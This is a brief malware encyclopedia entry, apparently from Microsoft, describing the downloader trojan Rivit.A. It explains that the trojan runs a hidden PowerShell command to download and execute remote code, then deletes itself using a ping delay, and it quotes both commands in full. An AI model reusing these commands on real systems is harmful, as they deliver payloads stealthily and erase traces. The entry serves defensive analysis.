Home / malware

PDF

TrojanDownloader:Win32/Rivit.A!dha

First posted on 15 April 2017.
Source: Microsoft

Aliases :

There are no other names known for TrojanDownloader:Win32/Rivit.A!dha.

Explanation :

This trojan opens a PowerShell process to download and run a file from a remote host:

• powershell.exe -nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring();

The trojan then uses a command prompt process to run a command that deletes the malware file. As part of the command, it pings an IP within the private network range (192.168.0.1 to 192.168.255.254) to cause a short delay to ensure the malware runs before it deletes itself.

We have seen it use the following command and IP address:

• cmd.exe /c ping -n 1 -w 2000 192.168.123.254 > nul & del

Analysis by Mathieu Letourneau

Last update 15 April 2017

 

TOP